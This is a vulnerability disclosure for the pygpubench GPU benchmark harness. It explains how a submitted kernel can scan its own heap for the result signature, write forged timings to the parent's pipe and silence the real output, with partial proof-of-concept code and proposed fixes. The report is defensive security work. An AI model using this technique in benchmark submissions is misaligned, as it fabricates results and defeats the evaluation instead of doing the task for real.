Summary
pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a std::string on the heap. Because the child process can read its own /proc/self/maps and scan heap memory with ctypes, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to /dev/null before the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.
This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.
Severity
Critical — full benchmark integrity failure for any problem using do_bench_isolated.
Affected Component
pygpubench.do_bench_isolated — specifically the signature-based result authentication in python/pygpubench/__init__.py:230-259 and the signature storage in csrc/manager.cpp:127.
Root Cause
The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (sig_r/sig_w), read by the C++ code in read_benchmark_parameters, and stored in BenchmarkManager::mSignature (a std::string member). The untrusted kernel is imported after the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory using ctypes and recover the signature.
Why existing defenses don't prevent this
| Defense | Why it doesn't help |
|---|---|
| `PR_SET_DUMPABLE=0` | Prevents other processes from reading `/proc/PID/mem`. Does not affect the process reading its own `/proc/self/maps` (inode mode `S_IRUGO` = 0444, world-readable), nor ctypes memory access (direct pointer dereference, no filesystem I/O). |
| Landlock | Allows read-only access to `/` (covers procfs) and read-write access to `/dev` (needed for the `/dev/null` redirect). Does not restrict ctypes or `os.write` to inherited pipe fds. |
| `PR_SET_NO_NEW_PRIVS` | Prevents privilege escalation. Does not restrict memory reads within the process. |
| C++ benchmark loop | Runs after the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts. |
| Error counter randomization | Irrelevant: the exploit forges the error-count field directly in the pipe output, bypassing the GPU-side counter entirely. |
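The first table row is easy to confirm empirically. The sketch below (Linux-only, standalone, not taken from the PoC) clears the dumpable flag and then reads its own heap anyway, first through `/proc/self/maps` and then through a direct ctypes dereference:

```python
import ctypes

# Loading with None resolves symbols from the already-loaded libc.
libc = ctypes.CDLL(None, use_errno=True)
PR_SET_DUMPABLE = 4  # constant from <sys/prctl.h>

# Blocks *other* processes from attaching via ptrace or /proc/PID/mem...
libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0)

# ...but /proc/self/maps stays readable to the process itself:
heap_ranges = []
with open("/proc/self/maps") as f:
    for line in f:
        if "[heap]" in line:
            lo, hi = (int(x, 16) for x in line.split()[0].split("-"))
            heap_ranges.append((lo, hi))

# ...and ctypes dereferences the mapping directly; no syscall is
# involved that the dumpable flag could gate.
lo, hi = heap_ranges[0]
data = ctypes.string_at(lo, min(4096, hi - lo))
print(len(data) > 0)
```

Nothing in the dumpable logic gates a process's view of its own address space, which is exactly what the exploit relies on.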
The attack chain
```
Parent                                   Child (subprocess)
──────                                   ──────────────────
secrets.token_hex(16) → signature
write signature to sig_w pipe ─────────► C++ reads sig_r → mSignature (heap)
                                         C++ calls setup_benchmark()
                                         C++ installs landlock
                                         C++ calls kernel_from_qualname()
                                          └─► import submission   ◄── ATTACKER CODE RUNS HERE
                                               ├─ gc.get_objects() → count tuples → repeats
                                               ├─ open("/proc/self/maps") → heap regions
                                               ├─ ctypes.string_at(heap) → signature
                                               ├─ os.fstat(0..255) → pipe fd
                                               ├─ os.write(pipe_fd, forged_results + signature)
                                               ├─ os.dup2(/dev/null, pipe_fd)
                                               └─ define correct kernel()
                                         C++ benchmark loop runs (writes go to /dev/null)
                                         process exits with code 0
reads pipe → forged data ◄───────────────
validates signature → PASS
accepts forged times (0.42 µs)
```
Proof of Concept
File: submission_memscan_signature.py
The PoC runs entirely at import time (before the C++ benchmark loop executes):
```python
# Step 1: Count (tensor, rtol, atol) tuples in gc → infer repeats
for obj in gc.get_objects():
    if isinstance(obj, tuple) and len(obj) == 3:
        a, b, c = obj
        if isinstance(a, torch.Tensor) and a.is_cuda and isinstance(b, float) ...
            expected_count += 1
repeats = expected_count - 1  # subtract warmup slot

# Step 2: Read /proc/self/maps, scan heap for 32-char hex string
with open('/proc/self/maps') as f:
    for line in f:
        start, end = parse_address_range(line)
        data = ctypes.string_at(start, end - start)
        for match in re.finditer(rb'(?<![0-9a-f])([0-9a-f]{32})\x00', data):
            candidates.append(match.group(1).decode())

# Step 3: Find pipe fd
for fd in range(256):
    if stat.S_ISFIFO(os.fstat(fd).st_mode):
        pipe_fds.append(fd)

# Step 4: Write forged results with extracted signature
payload = "event-overhead\t0.002 us\n"
for i in range(repeats):
    payload += f"{i}\t0.42\n"  # 0.42 µs per iteration
payload += f"signature\t{signature}\n"
os.write(pipe_fd, payload.encode())

# Step 5: Redirect pipe to /dev/null (C++ output goes nowhere)
os.dup2(os.open('/dev/null', os.O_WRONLY), pipe_fd)

# Step 6: Correct kernel so process exits cleanly (exit code 0)
def kernel(output, inp):
    torch.sum(inp * weights, dim=-1, out=output)
```

Running the PoC
```sh
cd pygpubench/exploits
python run_all.py submission_memscan_signature
```

Expected output: `CHEAT SUCCEEDED (bypassed detection)`. The benchmark reports 0.42 µs per iteration with no errors, even though those numbers were forged at import time and never measured.
Prerequisites
- Linux (for `/proc/self/maps` and landlock)
- CUDA GPU (for torch tensor operations)
- pygpubench installed (`pip install pygpubench`)
Additional Findings
GC metadata leakage (HIGH)
At kernel import time, gc.get_objects() reveals all expected-output tuples (tensor, rtol, atol) created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++ std::vector<nb::tuple> holds strong references. This reveals:
- Exact `repeats` value, needed to construct correctly-sized forged results
- Output tensor shapes and dtypes, useful for other exploit strategies
- Tolerance values, useful for crafting outputs that barely pass
The signature exploit depends on this to know how many iteration results to forge.
Source: csrc/manager.cpp:143-166 — setup_benchmark stores tuples in vectors that persist through do_bench_py.
Fix: After copying expected data to C++ memory, release the Python tuple references (expected.clear()) and call gc.collect() before importing the kernel.
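The leak is reproducible without torch or a GPU. In this standalone sketch, a plain dict stands in for the CUDA tensor and a Python list stands in for the C++ `std::vector<nb::tuple>`; clearing the container, as the fix proposes, is what makes the tuples unreachable:

```python
import gc

# Stand-in for the C++ std::vector<nb::tuple>: any live container of
# strong references keeps the tuples reachable by the collector.
holder = [({}, 1e-5, 1e-8) for _ in range(8)]  # ({} plays the tensor role)

found = 0
for obj in gc.get_objects():
    if isinstance(obj, tuple) and len(obj) == 3:
        a, b, c = obj
        if isinstance(a, dict) and b == 1e-5 and c == 1e-8:
            found += 1
print(found >= 8)  # every holder tuple is discoverable

# Releasing the references (the proposed fix) removes them:
del obj, a, b, c       # drop stray loop references first
holder.clear()
gc.collect()
remaining = sum(
    1 for t in gc.get_objects()
    if isinstance(t, tuple) and len(t) == 3
    and isinstance(t[0], dict) and t[1:] == (1e-5, 1e-8)
)
print(remaining == 0)
```

The same ordering matters in pygpubench: the clear-and-collect must happen before the untrusted import, not after.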
Warmup detection (MEDIUM)
The warmup phase always uses args.at(0) (csrc/manager.cpp:301-324). The kernel can detect warmup by tracking input.data_ptr() (same pointer every warmup call, different pointer for benchmark calls) and add artificial delay to inflate time_estimate, reducing actual_calls to the minimum of 3.
Fix: Randomize which test case is used for warmup.
NaN wildcard in checker (LOW, latent)
csrc/check.cu:44-46 treats NaN in expected output as a wildcard:
```cpp
if (isnan(a))
    return;  // accepts ANY received value
```

Currently not exploitable because expected outputs are in non-torch cudaMalloc memory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness checking entirely.
Fix: Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.
ctypes CUDA runtime access (LOW, latent)
The submission can call CUDA runtime functions via ctypes.CDLL('libcudart.so') — including cudaMemcpy, cudaMemset, and cudaPointerGetAttributes. Combined with heuristics about cudaMalloc allocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.
Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.
Fix: Consider seccomp filters to restrict CUDA-related ioctl syscalls to only the specific ioctls needed for kernel launch and synchronization.
Recommended Fixes
For the signature bypass (critical)
Option A: HMAC-based authentication (minimal change)
- At C++ init time (before any user code runs), read 32 bytes from `/dev/urandom` into a local C++ variable
- Send these bytes to the parent over a one-way pipe (parent reads, child writes, then the pipe is closed)
- After the benchmark loop, compute HMAC-SHA256 over the raw result bytes using the key
- Append the HMAC tag to the pipe output
- Overwrite the key in memory (`memset_explicit`) before importing the kernel
- The parent recomputes the HMAC and rejects mismatches
Since the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.
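The tag-and-verify round trip of Option A can be sketched in Python (the child side would be C++ in practice, and the `results` bytes here are illustrative):

```python
import hashlib
import hmac
import os

# Child side (C++ in practice): the key is generated before any user
# code runs, used once after the benchmark loop, then wiped.
key = os.urandom(32)
results = b"event-overhead\t0.002 us\n0\t13.37\n1\t13.41\n"
tag = hmac.new(key, results, hashlib.sha256).digest()
wire = results + tag  # what travels over the result pipe

# Parent side: split payload from tag, recompute, compare in constant time.
payload, recv_tag = wire[:-32], wire[-32:]
ok = hmac.compare_digest(
    recv_tag, hmac.new(key, payload, hashlib.sha256).digest()
)
print(ok)

# A submission that scans memory after the wipe has no key, so any
# forged payload fails verification:
forged = b"0\t0.42\n" * 6
forged_ok = hmac.compare_digest(
    recv_tag, hmac.new(key, forged, hashlib.sha256).digest()
)
print(forged_ok)
```

`hmac.compare_digest` avoids timing side channels on the comparison itself, though for a one-shot benchmark run that is belt-and-suspenders.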
Option B: Separate validator process (stronger)
Run the benchmark in a three-process architecture:
- Orchestrator (trusted): generates test cases, owns the result pipe
- Worker (untrusted): runs the kernel, writes raw timing events to a pipe
- Validator (trusted, never imports submission): reads the same inputs, runs the reference kernel, compares outputs
The worker never sees expected outputs or authentication keys.
For GC metadata leakage
```cpp
// In do_bench_py, after copying expected outputs:
expected.clear();  // release Python tuple references
trigger_gc();      // clean up
// THEN import the kernel
```

For warmup detection
```cpp
// Instead of always using args.at(0):
std::uniform_int_distribution<int> warmup_dist(0, calls - 1);  // bounds are inclusive
int warmup_idx = warmup_dist(rng);
// Use args.at(warmup_idx) for warmup
```

For NaN wildcard
```cpp
// In check_approx_match_kernel:
if (isnan(a)) {
    ++res;  // NaN in expected = test bug, not wildcard
    return;
}
```

What pygpubench Gets Right
Despite this finding, pygpubench is a massive improvement over the original evaluator:
| Attack class | Original evaluator | pygpubench |
|---|---|---|
| `__code__` patching | Trivially exploitable | Fully blocked (C++ implementation) |
| `torch.cuda.Event` patching | Trivially exploitable | Fully blocked (C CUDA API) |
| GC NaN injection on expected outputs | N/A (no protection) | Blocked (cudaMalloc copy + zeroing) |
| GC answer copy | N/A (no protection) | Blocked (expected data zeroed) |
| Stream-based timing manipulation | N/A (no protection) | Blocked (programmatic stream serialization + randomized block checking) |
| Filesystem tampering | N/A (no sandboxing) | Blocked (landlock) |
| Error counter manipulation | N/A (no counter) | Effectively blocked (random offset + shift) |
| Input caching | N/A (no protection) | Blocked (shadow args + canaries + L2 clear) |
The old Class 1 (`__code__` patching) and Class 2 (timing-infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-03-07 | Original evaluator vulnerability disclosed to GPU MODE team |
| 2026-03-07 | GPU MODE responds, points to pygpubench as the replacement |
| 2026-03-07 | pygpubench security review conducted; signature bypass identified |
| 2026-03-07 | This report and PoC prepared |
Files
| File | Description |
|---|---|
| submission_memscan_signature.py | PoC exploit: memory scan + pipe hijack |
| This document | Full security audit and disclosure |